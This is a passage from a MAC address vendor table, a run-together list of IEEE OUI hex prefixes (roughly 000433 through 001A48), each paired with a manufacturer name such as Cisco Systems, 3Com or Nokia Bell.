asteel electronique atlantique 0019D5 IP Innovations, Inc. 0019CC RCG (HK) Ltd 0019C8 AnyDATA Corporation 0019C4 Infocrypt Inc. 0019EA TeraMage Technologies Co., Ltd. 0019D8 MAXFOR 001A2E Ziova Coporation 001A32 ACTIVA MULTIMEDIA 001A48 Takacom Corporation 001A0B BONA TECHNOLOGY INC. 001A06 OpVista, Inc. 001A21 Brookhuis Applied Technologies BV 001973 Zeugma Systems 001975 Beijing Huisen networks technology Inc 00197B Picotest Corp. 00196E Metacom (Pty) Ltd. 001965 YuHua TelTech (ShangHai) Co., Ltd. 001966 Asiarock Technology Limited 00195C Innotech Corporation 00195F Valemount Networks Corporation 0019A5 RadarFind Corporation 001993 Changshu Switchgear MFG. Co.,Ltd. (Former Changshu Switchgea 001945 RF COncepts, LLC 001948 AireSpider Networks 001981 Vivox Inc 0019AD BOBST SA 0019A2 ORDYN TECHNOLOGIES 001943 Belden 001940 Rackable Systems 00193C HighPoint Technologies Incorporated 00199B Diversified Technical Systems, Inc. 001990 ELM DATA Co., Ltd. 00198F Nokia Bell N.V. 001926 BitsGen Co., Ltd. 001929 2M2B Montadora de Maquinas Bahia Brasil LTDA 00192A Antiope Associates 00190F Advansus Corp. 001911 Just In Mobile Information Technologies (Shanghai) Co., Ltd. 001917 Posiflex Inc. 001918 Interactive Wear AG 00190B Southern Vision Systems, Inc. 001903 Bigfoot Networks Inc 0018BD SHENZHEN DVBWORLD TECHNOLOGY CO., LTD. 0018B2 ADEUNIS RF 0018B3 TEC WizHome Co., Ltd. 0018AC Shanghai Jiao Da HISYS Technology Co. Ltd. 0018F1 Chunichi Denshi Co.,LTD. 0018F2 Beijing Tianyu Communication Equipment Co., Ltd 0018EC Welding Technology Corporation 0018ED Accutech Ultrasystems Co., Ltd. 00192E Spectral Instruments, Inc. 00192B Aclara RF Systems Inc. 00191E Beyondwiz Co., Ltd. 00191F Microlink communications Inc. 001920 KUME electric Co.,Ltd. 0018E0 ANAVEO 0018CE Dreamtech Co., Ltd 0018AB BEIJING LHWT MICROELECTRONICS INC. 0018A5 ADigit Technologies Corp. 0018A6 Persistent Systems, LLC 0018CB Tecobest Technology Limited 001900 Intelliverese - DBA Voicecom 001902 Cambridge Consultants Ltd 00189B Thomson Inc. 001894 NPCore, Inc. 001898 KINGSTATE ELECTRONICS CORPORATION 001892 ads-tec GmbH 001891 Zhongshan General K-mate Electronics Co., Ltd 001889 WinNet Solutions Limited 001847 AceNet Technology Inc. 0017F9 Forcom Sp. z o.o. 0017F4 ZERON ALLIANCE 0017F7 CEM Solutions Pvt Ltd 0017ED WooJooIT Ltd. 0017DD Clipsal Australia 001843 Dawevision Ltd 00182C Ascend Networks, Inc. 001836 REJ Co.,Ltd 00186A Global Link Digital Technology Co,.LTD 001878 Mackware GmbH 00186B Sambu Communics CO., LTD. 00186E 3Com Ltd 001877 Amplex A/S 001867 Datalogic ADC 001865 Siemens Healthcare Diagnostics Manufacturing Ltd 001805 Beijing InHand Networking Technology Co.,Ltd. 00180D Terabytes Server Storage Tech Corp 00181D ASIA ELECTRONICS CO.,LTD 00181F Palmmicro Communications 00181B TaiJin Metal Co., Ltd. 001854 Argard Co., Ltd 0017C4 Quanta Microsystems, INC. 0017BD Tibetsystem 0017BF Coherent Research Limited 00175B ACS Solutions Switzerland Ltd. 001758 ThruVision Ltd 00174F iCatch Inc. 00179E Sirit Inc 0017A7 Mobile Computing Promotion Consortium 00179F Apricorn 0017A1 3soft inc. 001792 Falcom Wireless Comunications Gmbh 001797 Telsy Elettronica S.p.A. 00178C Independent Witness, Inc 001788 Philips Lighting BV 00174A SOCOMEC 00174E Parama-tech Co.,Ltd. 0017B4 Remote Security Systems, LLC 0017AC O'Neil Product Development Inc. 0017AD AceNet Corporation 00176F PAX Computer Technology(Shenzhen) Ltd. 001771 APD Communications Ltd 0017D9 AAI Corporation 0017DC DAEMYUNG ZERO1 0017D3 Etymotic Research, Inc. 0017CC Alcatel-Lucent 001766 Accense Technology, Inc. 001764 ATMedia GmbH 00175E Zed-3 00173C Extreme Engineering Solutions 001736 iiTron Inc. 001737 Industrie Dial Face S.p.A. 001733 SFR 001729 Ubicod Co.LTD 0016D0 ATech elektronika d.o.o. 0016C3 BA Systems Inc 0016B0 VK Corporation 0016B1 KBS 0016AE INVENTEL 0016AC Toho Technology Corp. 00169C Cisco Systems, Inc 001727 Thermo Ramsey Italia s.r.l. 00172A Proware Technology Corp.(By Unifosa) 001725 Liquid Computing 0016FC TOHKEN CO.,LTD. 0016F0 Dell 0016F8 AVIQTECH TECHNOLOGY CO., LTD. 0016E8 Lumissil Microsystems 00171B Innovation Lab Corp. 001714 BR Controls Nederland bv 0016C1 Eleksen Ltd 0016A9 2EI 001709 Exalt Communications 001703 MOSDAN Internation Co.,Ltd 0016E9 Tiba Medical Inc 0016DC ARCHOS 00161B Micronet Corporation 001618 HIVION Co., Ltd. 00161E Woojinnet 00161F SUNWAVETEC Co., Ltd. 001614 Picosecond Pulse Labs 00160E Optica Technologies Inc. 001683 WEBIO International Co.,.Ltd. 001684 Donjin Co.,Ltd. 001687 Chubb CSC-Vendor AP 00167F Bluebird Soft Inc. 00167C iRex Technologies BV 001644 LITE-ON Technology Corp. 001643 Sunhillo Corporation 00163E Xensource, Inc. 001634 Mathtech, Inc. 001605 YORKVILLE SOUND INC. 0015F9 Cisco Systems, Inc 0015FD Complete Media Systems 001665 Cellon France 00165F Fairmount Automation 001657 Aegate Ltd 00162C Xanboo 00164C PLANET INT Co., Ltd 001649 SetOne GmbH 001647 Cisco Systems, Inc 001694 Sennheiser Communications A/S 00168C DSL Partner AS 001673 Bury GmbH & Co. KG 001570 Zebra Technologies Inc 00156E A. W. Communication Systems Ltd 001568 Dilithium Networks 00155F GreenPeak Technologies 0015AD Accedian Networks 0015AC Capelon AB 0015A9 KWANG WOO I&C CO.,LTD 00E0A8 SAT GmbH & Co. 00155A DAINIPPON PHARMACEUTICAL CO., LTD. 0015E3 Dream Technologies Corporation 0015E0 Ericsson 0015D3 Pantech&Curitel Communications, Inc. 001574 Horizon Semiconductors Ltd. 001598 Kolektor group 00158A SURECOM Technology Corp. 00158E Plustek.INC 001589 D-MAX Technology Co.,Ltd 0015CA TeraRecon, Inc. 0015B4 Polymap Wireless LLC 0015F6 SCIENCE AND ENGINEERING SERVICES, INC. 0015F3 PELTOR AB 0015E7 Quantec Tontechnik 0014F4 DekTec Digital Video B.V. 0014F5 OSI Security Devices 0014EC Acro Telecom 0014EB AwarePoint Corporation 00154B Wonde Proud Technology Co., Ltd 001548 CUBE TECHNOLOGIES 00153C Kprotech Co., Ltd. 00151D M2I CORPORATION 001512 Zurich University of Applied Sciences 0014CD DigitalZone Co., Ltd. 0014C0 Symstream Technology Group Ltd 0014C1 U.S. Robotics Corporation 0014C4 Vitelcom Mobile Technology 0014FF Precise Automation, Inc. 0014FA AsGa S.A. 0014FB Technical Solutions Inc. 00153A Shenzhen Syscan Technology Co.,Ltd. 001532 Consumer Technologies Group, LLC 00150A Sonoa Systems, Inc 0014D2 Kyuden Technosystems Corporation 0014DC Communication System Design & Manufacturing (CSDM) 001444 Grundfos Holding 001437 GSTeletech Co.,Ltd. 001431 PDL Electronics Ltd 00142B Edata Communication Inc. 00142C Koncept International, Inc. 001424 Merry Electrics CO., LTD. 0014AB Senhai Electronic Technology Co., Ltd. 0014B0 Naeil Community 0014AD Gassner Wiege- und Meßtechnik GmbH 0014AF Datasym POS Inc. 0014A9 Cisco Systems, Inc 00149B Nokota Communications, LLC 0014A1 Synchronous Communication Corp 00149E UbONE Co., Ltd 0014A2 Core Micro Systems Inc. 001421 Total Wireless Technologies Pte. Ltd. 001420 G-Links networking company 001418 C4Line 00141B Cisco Systems, Inc 00140F Federal State Unitary Enterprise Leningrad R&D Institute of 00148E Tele Power Inc. 00148F Protronic (Far East) Ltd. 00148C General Dynamics Mission Systems 001487 American Technology Integrators 001458 HS Automatic ApS 00144D Intelligent Systems 00144A Taiwan Thick-Film Ind. Corp. 001445 Telefon-Gradnja d.o.o. 001468 CelPlan International, Inc. 001464 Cryptosoft 00145E IBM Corp 001481 Multilink Inc 00147C 3Com Ltd 00137D Dynalab, Inc. 001383 Application Technologies and Engineering Research Laboratory 001387 27M Technologies AB 001373 BLwave Electronics Co., Ltd 00136F PacketMotion, Inc. 0013BD HYMATOM SA 0013BA ReadyLinks Inc 0013B8 RyCo Electronic Systems Limited 0013B6 Sling Media, Inc. 0013B4 Appear AS 0013FA LifeSize Communications, Inc 0013FB RKC INSTRUMENT INC. 0013F0 Wavefront Semiconductor 0013EF Kingjon Digital Technology Co.,Ltd 0013EB Sysmaster Corporation 0013EC Netsnapper Technologies SARL 0013AE Radiance Technologies, Inc. 001397 Oracle Corporation 00135E EAB/RWI/K 00134E Valox Systems, Inc. 001344 Fargo Electronics Inc. 001348 Artila Electronics Co., Ltd. 0013D0 t+ Medical Ltd 0013D2 PAGE IBERICA, S.A. 0013D1 KIRK telecom A/S 0013C3 Cisco Systems, Inc 001366 Neturity Technologies Inc. 00135B PanelLink Cinema, LLC 001407 Sperian Protection Instrumentation 001406 Go Networks 00140A WEPIO Co., Ltd. 0012D6 Jiangsu Yitong High-Tech Co.,Ltd 0012DA Cisco Systems, Inc 0012D3 Zetta Systems, Inc. 0012D5 Motion Reality Inc. 0012D8 International Games System Co., Ltd. 0012A2 VITA 0012A8 intec GmbH 0012A5 Dolphin Interconnect Solutions AS 00129E Surf Communications Inc. 0012E9 Abbey Systems Ltd 0012E6 SPECTEC COMPUTER CO., LTD. 0012E3 Agat Soft LLC 0012DB ZIEHL industrie-elektronik GmbH + Co KG 001322 DAQ Electronics, Inc. 001323 Cap Co., Ltd. 001314 Asiamajor Inc. 001316 L-S-B Broadcast Technologies GmbH 001312 Amedia Networks Inc. 001300 IT-FACTORY, INC. 0012BA FSI Systems, Inc. 0012B2 AVOLITES LTD. 0012AE HLS HARD-LINE Solutions Inc. 0012AF ELPRO Technologies 001336 Tianjin 712 Communication Broadcasting co., ltd. 0012EF OneAccess SA 001242 Millennial Net 001241 a2i marketing center 00123B KeRo Systems ApS 001236 ConSentry Networks 001235 Andrew Corporation 00120D Advanced Telecommunication Technologies, Inc. 00120E AboCom 001202 Decrane Aerospace - Audio International Inc. 0011FE Keiyo System Research, Inc. 0011FD KORG INC. 0011FA Rane Corporation 001226 Japan Direx Corporation 001229 BroadEasy Technologies Co.,Ltd 001222 Skardin (UK) Ltd 001228 Data Ltd. 00121F Harding Instruments 001251 SILINK 001245 Zellweger Analytics, Inc. 00129A IRT Electronics Pty Ltd 00128D STB Datenservice GmbH 00128E Q-Free ASA 001292 Griffin Technology 001265 Enerdyne Technologies, Inc. 001257 LeapComm Communication Technologies Inc. 001277 Korenix Technologies Co., Ltd. 00126D University of California, Berkeley 001267 Panasonic Corporation 001282 Qovia 001287 Digital Everywhere Unterhaltungselektronik GmbH 001285 Gizmondo Europe Ltd 001220 Cadco Systems 001210 WideRay Corp 0011F2 Institute of Network Technologies 0011F3 NeoMedia Europe AG 0011E9 STARNEX CO., LTD. 0011EC AVIX INC. 0011E7 WORLDSAT - Texas de France 0011A3 LanReady Technologies Inc. 0011A4 JStream Technologies Inc. 001198 Prism Media Products Limited 001197 Monitoring Technologies Limited 001199 2wcom Systems GmbH 00116B Digital Data Communications Asia Co.,Ltd 001169 EMS Satcom 001162 STAR MICRONICS CO.,LTD. 001161 NetStreams, LLC 001156 Pharos Systems NZ 001159 MATISSE NETWORKS INC 00115C Cisco Systems, Inc 001176 Intellambda Systems, Inc. 001177 Coaxial Networks, Inc. 001170 GSC SRL 0011B7 Octalix B.V. 0011B9 Inner Range Pty. Ltd. 0011A7 Infilco Degremont Inc. 0011CE Ubisense Limited 0011D0 Tandberg Data ASA 0011C3 Transceiving System Technology Corporation 0011C2 United Fiber Optic Communication 001194 Chi Mei Communication Systems, Inc. 001181 InterEnergy Co.Ltd, 0011E8 Tixi.Com 0011E0 U-MEDIA Communications, Inc. 0011BF AESYS S.p.A. 000FC9 Allnet GmbH 000FC6 Eurocom Industries A/S 000FBE e-w/you Inc. 000FC0 DELCOMp 000FBA Tevebox AB 000FB8 CallURL Inc. 000FB7 Cavium 001109 Micro-Star International 001104 TELEXY 001100 Schneider Electric 000FFA Optinel Systems, Inc. 000FD8 Force, Inc. 000FD3 Digium 000FD1 Applied Wireless Identifications Group, Inc. 000FC1 WAVE Corporation 000FC4 NST co.,LTD. 000FFD Glorytek Network Inc. 000FF9 Valcretec, Inc. 000FF7 Cisco Systems, Inc 001134 MediaCell, Inc. 001135 Grandeye Ltd 001126 Venstar Inc. 00112E CEICOM 001121 Cisco Systems, Inc 001122 CIMSYS Inc 001116 COTEAU VERT CO., LTD. 001110 Maxanna Technology Co., Ltd. 00115D Cisco Systems, Inc 001149 Proliphix Inc. 00113B Micronet Communications Inc. 00113D KN SOLTEC CO.,LTD. 000FEA Giga-Byte Technology Co.,LTD. 000F90 Cisco Systems, Inc 000F8D FAST TV-Server AG 000F85 ADDO-Japan Corporation 000F82 Mortara Instrument, Inc. 000F81 PAL Pacific Inc. 000F7F UBSTORAGE Co.,Ltd. 000F1C DigitAll World Co., Ltd 000F1A Gaming Support B.V. 000F0A Clear Edge Networks 000F4A Kyushu-kyohan co.,ltd 000F44 Tivella Inc. 000F40 Optical Internetworking Forum 000F33 DUALi Inc. 000F2F W-LINX TECHNOLOGY CO., LTD. 000F68 Vavic Network Technology, Inc. 000F60 Lifetron Co.,Ltd 000F5B Delta Information Systems, Inc. 000F55 Datawire Communication Networks Inc. 000F02 Digicube Technology Co., Ltd 000F05 3B SYSTEM INC. 000F77 DENTUM CO.,LTD 000F7B Arce Sistemas, S.A. 000F56 Continuum Photonics Inc 000F49 Northover Solutions Limited 000F4B Oracle Corporation 000F95 ELECOM Co.,LTD Laneed Division 000F8A WideView 000FA9 PC Fabrik 000F9A Synchrony, Inc. 000FA0 Canon Korea Inc. 000EF7 Vulcan Portals Inc 000EE9 WayTech Development, Inc. 000EF0 Festo AG & Co. KG 000EEB Sandmartin(zhong shan)Electronics Co.,Ltd 000EEC Orban 000EEF Private 000EF1 EZQUEST INC. 000EE7 AAC ELECTRONICS CORP. 000ED0 Privaris, Inc. 000EC3 Logic Controls, Inc. 000EC4 Iskra Transmission d.d. 000EC1 MYNAH Technologies 000EBD Burdick, a Quinton Compny 000EB9 HASHIMOTO Electronics Industry Co.,Ltd. 000E4F Trajet GmbH 000E50 Thomson Telecom Belgium 000E4B atrium c and i 000EE2 Custom Engineering 000EE3 Chiyu Technology Co.,Ltd 000EE5 bitWallet, Inc. 000ECF PROFIBUS Nutzerorganisation e.V. 000EDA C-TECH UNITED CORP. 000EC9 YOKO Technology Corp. 000E98 HME Clear-Com LTD. 000E99 Spectrum Digital, Inc 000E95 Fujiya Denki Seisakusho Co.,Ltd. 000E97 Ultracker Technology CO., Inc 000E82 Infinity Tech 000E89 CLEMATIC 000E79 Ample Communications Inc. 000EA7 Endace Technology 000EA1 Formosa Teletek Corporation 000EB2 Micro-Research Finland Oy 000EB5 Ecastle Electronics Co., Ltd. 000E6F IRIS Corporation Berhad 000DCB Petcomkorea Co., Ltd. 000DCC NEOSMART Corp. 000DCE Dynavac Technology Pte Ltd 000DC3 First Communication, Inc. 000DB9 PC Engines GmbH 000E04 CMA/Microdialysis AB 000DE8 Nasaco Electronics Pte. Ltd 000DE9 Napatech Aps 000DE6 YOUNGBO ENGINEERING CO.,LTD 000E17 Private 000E15 Tadlys LTD 000E1D ARION Technology Inc. 000E12 Adaptive Micro Systems Inc. 000DB7 SANKO ELECTRIC CO,.LTD 000DAC Japan CBM Corporation 000DDF Japan Image & Network Inc. 000DDB AIRWAVE TECHNOLOGIES INC. 000E45 Beijing Newtry Electronic Technology Ltd 000E3F Soronti, Inc. 000E38 Cisco Systems, Inc 000E36 HEINESYS, Inc. 000E2B Safari Technologies 000E28 Dynamic Ratings P/L 000E01 ASIP Technologies Inc. 000D46 Parker SSD Drives 000D41 Siemens AG ICM MP UC RD IT KLF1 000D42 Newbest Development Limited 000D3C i.Tech Dynamic Ltd 000D35 PAC International Ltd 000D13 Wilhelm Rutenbeck GmbH&Co.KG 000D19 ROBE Show lighting 000D1C Amesys Defense 000D16 UHS Systems Pty Ltd 000D1F AV Digital 000CED Real Digital Media 000CF0 M & N GmbH 000CF4 AKATSUKI ELECTRIC MFG.CO.,LTD. 000CF3 CALL IMAGE SA 000CE0 Trek Diagnostics Inc. 000CE2 Rolls-Royce 000D2A Scanmatic AS 000D29 Cisco Systems, Inc 000D26 Primagraphics Limited 000D57 Fujitsu I-Network Systems Limited. 000D58 Private 000D51 DIVR Systems, Inc. 000D45 Tottori SANYO Electric Co., Ltd. 000D0C MDI Security Systems 000D01 P&E Microcomputer Systems, Inc. 000D00 Seaway Networks Inc. 000CF9 Xylem Water Solutions 000D62 Funkwerk Dabendorf GmbH 000D65 Cisco Systems, Inc 000D55 SANYCOM Technology Co.,Ltd 000D95 Opti-cell, Inc. 000D91 Eclipse (HQ Espana) S.L. 000D80 Online Development Inc 000CA3 Rancho Technology, Inc. 000CAA Cubic Transportation Systems Inc 000CAC Citizen Watch Co., Ltd. 000CAE Ailocom Oy 000C9E MemoryLink Corp. 000C95 PrimeNet 000C7F synertronixx GmbH 000C81 Schneider Electric (Australia) 000C80 Opelcomm Inc. 000C7D TEIKOKU ELECTRIC MFG. CO., LTD 000C9C Chongho information & communications 000C97 NV ADB TTV Technologies SA 000C8F Nergal s.r.l. 000C92 WolfVision Gmbh 000C93 Xeline Co., Ltd. 000CC4 Tiptel AG 000CBA Jamex, Inc. 000C76 MICRO-STAR INTERNATIONAL CO., LTD. 000C68 SigmaTel, Inc. 000CD1 SFOM Technology Corp. 000CD8 M. K. Juchheim GmbH & Co 000CB7 Nanjing Huazhuo Electronics Co., Ltd. 000CCE Cisco Systems, Inc 000CCF Cisco Systems, Inc 000CC6 Ka-Ro electronics GmbH 000CAD BTU International 000BE5 HIMS International Corporation 000BE9 Actel Corporation 000BE3 Key Stream Co., Ltd. 000BE8 AOIP 000BDC AKCP 000BD8 Industrial Scientific Corp. 000BD7 DORMA Time + Access GmbH 000BD3 cd3o 000BD5 Nvergence, Inc. 000BD1 Aeronix, Inc. 000BD2 Remopro Technology Inc. 000BC7 ICET S.p.A. 000C0E XtremeSpectrum, Inc. 000C12 Micro-Optronic-Messtechnik GmbH 000C10 PNI Corporation 000C0A Guangdong Province Electronic Technology Research Institute 000C0B Broadbus Technologies 000C40 Altech Controls 000C3E Crest Audio 000C3A Oxance 000C35 KaVo Dental GmbH & Co. KG 000C37 Geomation, Inc. 000C07 Iftest AG 000C0C APPRO TECHNOLOGY INC. 000BF9 Gemstone Communications, Inc. 000C56 Megatel Computer (1986) Corp. 000C57 MACKIE Engineering Services Belgium BVBA 000C23 Beijing Lanchuan Tech. Co., Ltd. 000C25 Allied Telesis Labs, Inc. 000C18 Zenisu Keisoku Inc. 000BFC Cisco Systems, Inc 000BEA Zultys Technologies 000BDD TOHOKU RICOH Co., LTD. 000C54 Pedestal Networks, Inc 000C4A Cygnus Microsystems (P) Limited 000B95 eBet Gaming Systems Pty Ltd 000B98 NiceTechVision 000B9E Yasing Technology Corp. 000B88 Vidisco ltd. 000B8A MITEQ Inc. 000B8C Flextronics 000B90 ADVA Optical Networking Ltd. 000BB8 Kihoku Electronic Co. 000BC0 China IWNComm Co., Ltd. 000BB0 Sysnet Telematica srl 000BB4 RDC Semiconductor Inc., 000B45 Cisco Systems, Inc 000B4C Clarion (M) Sdn Bhd 000B4B VISIOWAVE SA 000B36 Productivity Systems, Inc. 000B35 Quad Bit System co., Ltd. 000B3F Anthology Solutions Inc. 000B54 BiTMICRO Networks, Inc. 000B43 Microscan Systems, Inc. 000B79 X-COM, Inc. 000B87 American Reliance Inc. 000B75 Iosoft Ltd. 000B3C Cygnal Integrated Products, Inc. 000B27 Scion Corporation 000B70 Load Technology, Inc. 000B6F Media Streaming Networks Inc 000B63 Kaleidescape 000B68 Addvalue Communications Pte Ltd 000B58 Astronautics C.A LTD 000B55 ADInstruments 000BAC 3Com Ltd 000B9F Neue ELSA GmbH 000AAE Rosemount Process Analytical 000AB3 Fa. GIRA 000ABA Arcon Technology Limited 000AAF Pipal Systems 000AB2 Fresnel Wireless Systems 000AB6 COMPUNETIX, INC 000AAA AltiGen Communications Inc. 000AC1 Futuretel 000ABE OPNET Technologies CO., LTD. 000AC3 eM Technics Co., Ltd. 000AC4 Daewoo Teletech Co., Ltd 000AC0 Fuyoh Video Industry CO., LTD. 000A8D EUROTHERM LIMITED 000A9F Pannaway Technologies, Inc. 000AA0 Cedar Point Communications 000A8F Aska International Inc. 000A8E Invacom Ltd 000A99 Calamp Wireless Networks Inc 000B0B Corrent Corporation 000B08 Pillar Data Systems 000AFA Traverse Technologies Australia 000AFC Core Tec Communications, LLC 000B21 G-Star Communications Inc. 000B25 Aeluros 000B1A Industrial Defender, Inc. 000B15 Platypus Technology 000B18 Private 000B0D Air2U, Inc. 000AE1 EG Technology 000ADF Gennum Corporation 000ADA Vindicator Technologies 000AC9 Zambeel Inc 000AE7 ELIOP S.A. 000AE8 Cathay Roxus Information Technology Co. LTD 000ADD Allworx Corp. 000AF1 Clarity Design, Inc. 000AF3 Cisco Systems, Inc 000AEC Koatsu Gas Kogyo Co., Ltd. 000A93 W2 Networks, Inc. 000A89 Creval Systems, Inc. 000A34 Identicard Systems Incorporated 000A30 Visteon Corporation 000A2F Artnix Inc. 000A2C Active Tchnology Corporation 000A2A QSI Systems Inc. 000A5D FingerTec Worldwide Sdn Bhd 000A5C Carel s.p.a. 000A5A GreenNET Technologies Co.,Ltd. 000A56 HITACHI Maxell Ltd. 000A51 GyroSignal Technology Co., Ltd. 000A53 Intronics, Incorporated 0009E3 Angel Iglesias S.A. 0009D6 KNC One GmbH 0009C7 Movistec 0009C9 BlueWINC Co., Ltd. 0009D4 Transtech Networks 000A1F ART WARE Telecommunication Co., Ltd. 000A15 Silicon Data, Inc 000A1B Stream Labs 000A1A Imerge Ltd 000A76 Beida Jade Bird Huaguang Technology Co.,Ltd 000A60 Autostar Technology Pte Ltd 0009F1 Yamaki Electric Corporation 0009F4 Alcon Laboratories, Inc. 0009F5 Emerson Network Power Co.,Ltd 0009EA YEM Inc. 000A0A SUNIX Co., Ltd. 000A05 Widax Corp. 000A04 3Com Ltd 000A4A Targa Systems Ltd. 000A39 LoPA Information Technology 000A37 Procera Networks, Inc. 000A80 Telkonet Inc. 000A79 corega K.K 00092F Akom Technology Corporation 00091F A&D Co., Ltd. 000924 Telebau GmbH 000921 Planmeca Oy 0009CB HBrain 0009C5 KINGENE Technology Corporation 0009CD HUDSON SOFT CO.,LTD. 0009C0 6WIND 00097E IMI TECHNOLOGY CO., LTD 000971 Time Management, Inc. 000974 Innopia Technologies, Inc. 000967 Tachyon, Inc 00096A Cloverleaf Communications Inc. 00095A RACEWOOD TECHNOLOGY 0009BF Nintendo Co., Ltd. 0009BA MAKU Informationstechik GmbH 0009B4 KISAN TELECOM CO., LTD. 0009AE OKANO ELECTRIC CO.,LTD 000951 Apogee Imaging Systems 00094E BARTECH SYSTEMS INTERNATIONAL, INC 000947 Aztek, Inc. 000991 Intelligent Platforms, LLC. 000996 RDI 00098B Entropic Communications, Inc. 00093D Newisys,Inc. 000938 Allot Communications 00090C Mayekawa Mfg. Co. Ltd. 00090D LEADER ELECTRONICS CORP. 0008FE UNIK C&C Co.,Ltd. 0008FF Trilogy Communications Ltd 000904 MONDIAL electronic 0008FC Gigaphoton Inc. 0008C6 Philips Consumer Communications 0008BF Aptus Elektronik AB 0008B8 E.F. Johnson 0008BB NetExcell 0008BE XENPAK MSA Group 000919 MDS Gateways 000918 SAMSUNG TECHWIN CO.,LTD 000910 Simple Access Inc. 000914 COMPUTROLS INC. 0008A8 Systec Co., Ltd. 0008A4 Cisco Systems, Inc 000897 Quake Technologies 000890 AVILINKS SA 00088D Sigma-Links Inc. 0008EF DIBAL,S.A. 0008F0 Next Generation Systems, Inc. 0008E9 NextGig 0008C1 Avistar Communications Corporation 0008E7 SHI ControlSystems,Ltd. 0008D7 HOW CORPORATION 000884 Index Braille AB 08006B ACCEL TECHNOLOGIES INC. 00081A Sanrad Intelligence Storage Communications (2000) Ltd. 000810 Key Technology, Inc. 000807 Access Devices Limited 0007FC Adept Systems Inc. 0007C6 VDS Vosskuhler GmbH 0007CC Kaba Benzing GmbH 0007C0 NetZerver Inc. 000865 JASCOM CO., LTD 000864 Fasy S.p.A. 000860 LodgeNet Entertainment Corp. 000851 Canadian Bank Note Company, Ltd. 000859 ShenZhen Unitone Electronics Co., Ltd. 00084E DivergeNet, Inc. 00047E Siqura B.V. 0007BC Identix Inc. 0007E8 EdgeWave 0007EB Cisco Systems, Inc 0007F5 Bridgeco Co AG 0007EC Cisco Systems, Inc 000825 Acme Packet 00081F Pou Yuen Tech Corp. Ltd. 000819 Banksys 0007B8 Corvalent Corporation 0007A9 Novasonics 0007DC Atek Co, Ltd. 0007A1 VIASYS Healthcare GmbH 00079E Ilinx Co., Ltd. 0007A0 e-Watch Inc. 000794 Simple Devices, Inc. 000797 Netpower Co., Ltd. 000748 The Imaging Source Europe 000746 TURCK, Inc. 000741 Sierra Automated Systems 000745 Radlan Computer Communications Ltd. 00073E China Great-Wall Computer Shenzhen Co., Ltd. 00073B Tenovis GmbH & Co KG 000731 Ophir-Spiricon LLC 00072B Jung Myung Telecom Co., Ltd. 000718 iCanTek Co., Ltd. 000716 J & S Marine Ltd. 00071A Finedigital Inc. 00071E Tri-M Engineering / Nupak Dev. Corp. 000717 Wieland Electric GmbH 000711 Acterna 00070A Unicom Automation Co., Ltd. 00075F VCS Video Communication Systems AG 00075C Eastman Kodak Company 000756 Juyoung Telecom 00075A Air Products and Chemicals, Inc. 000709 Westerstrand Urfabrik AB 000702 Varex Imaging 000705 Endress & Hauser GmbH & Co 00078C Elektronikspecialisten i Borlange AB 000781 Itron Inc. 000788 Clipcomm, Inc. 00077B Millimetrix Broadband Networks 000769 Italiana Macchi SpA 00076B Stralfors AB 000768 Danfoss A/S 0006FF Sheba Systems Co., Ltd. 0006EB Global Data 0006D3 Alpha Telecom, Inc. U.S.A. 0006A4 INNOWELL Corp. 000647 Etrali S.A. 0006D6 Cisco Systems, Inc 0006CB Jotron Electronics A/S 0006CD Leaf Imaging Ltd. 000694 Mobillian Corporation 000695 Ensure Technologies, Inc. 000691 PT Inovacao 000692 Intruvert Networks, Inc. 000674 Spectrum Control, Inc. 000663 Human Technology Co., Ltd. 000665 Sunny Giken, Inc. 000662 MBM Technology Ltd. 000669 Datasound Laboratories Ltd 00066E Delta Electronics, Inc. 000652 Cisco Systems, Inc 000656 Tactel AB 00065A Strix Systems 000641 ITCN 000648 Seedsware, Inc. 00064C Invicta Networks, Inc. 000638 Sungjin C&C Co., Ltd. 00068B AirRunner Technologies, Inc. 000687 Omnitron Systems Technology, Inc. 0006A1 Celsian Technologies, Inc. 0006AB W-Link Systems, Inc. 0006AC Intersoft Co. 0006E3 Quantitative Imaging Corporation 0006E4 Citel Technologies Ltd. 0006D9 IPM-Net S.p.A. 0006C7 RFNET Technologies Pte Ltd (S) 0006B9 A5TEK Corp. 0005C0 Digital Network Alacarte Co., Ltd. 0005B8 Electronic Design Associates, Inc. 0005BA Area Netwoeks, Inc. 0005BF JustEzy Technology, Inc. 0005AC Northern Digital, Inc. 00057D Sun Communications, Inc. 000581 Snell 000586 Lucent Technologies 00057B Chung Nam Electronic Co., Ltd. 000571 Seiwa Electronics Co. 000570 Baydel Ltd. 000577 SM Information & Communication 0005AD Topspin Communications, Inc. 0005B1 ASB Technology BV 000599 DRS Test and Energy Management or DRS-TEM 00059A Cisco Systems, Inc 0005AB Cyber Fone, Inc. 000592 Pultek Corp. 00058B IPmental, Inc. 00061A Zetari Inc. 00061F Vision Components GmbH 00061B Notebook Development Lab. Lenovo Japan Ltd. 00060F Narad Networks Inc 000610 Abeona Networks Inc 0005D1 Metavector Technologies 0005D5 Speedcom Wireless 0005D2 DAP Technologies 0005C5 Flaga HF 0005CA Hitron Technology, Inc. 000611 Zeus Wireless, Inc. 0005EC Mosaic Systems Inc. 000602 Cirkitech Electronics Co. 0005FB ShareGate, Inc. 000635 PacketAir Networks, Inc. 0005F0 SATEC 0005FE Traficon N.V. 000513 VTLinx Multimedia Systems, Inc. 00050E 3ware, Inc. 000510 Infinite Shanghai Communication Terminals Ltd. 000501 Cisco Systems, Inc 000508 Inetcam, Inc. 0004FF Acronet Co., Ltd. 000504 Naray Information & Communication Enterprise 0004E0 Procket Networks 0004DB Tellus Group Corp. 0004DD Cisco Systems, Inc 008086 COMPUTER GENERATION INC. 0004D7 Omitec Instrumentation Ltd. 00052B HORIBA, Ltd. 00051D Airocon, Inc. 000516 SMART Modular Technologies 000515 Nuark Co., Ltd. 00051B Magic Control Technology Corporation 0004D4 Proview Electronics Co., Ltd. 0004CD Extenway Solutions Inc 0004C0 Cisco Systems, Inc 000538 Merilus, Inc. 000530 Andiamo Systems, Inc. 0004BA KDD Media Will Corporation 0004B6 Stratex Networks, Inc. 0004B3 Videotek, Inc. 0004A4 NetEnabled, Inc. 000509 AVOC Nishimura Ltd. 0004FB Commtech, Inc. 0004E9 Infiniswitch Corporation 0004E8 IER, Inc. 000549 Salira Optical Network Systems 00054C RF Innovations Pty Ltd 000543 IQ Wireless GmbH 00056E National Enhance Technology, Inc. 00056D Pacific Corporation 00055C Kowa Company, Ltd. 000470 ipUnplugged AB 00046C Cyber Technology Co., Ltd. 000471 IPrad 00046E Cisco Systems, Inc 000474 LEGRAND 00045D BEKA Elektronik 000459 Veristar Corporation 000433 Cyberboard A/S 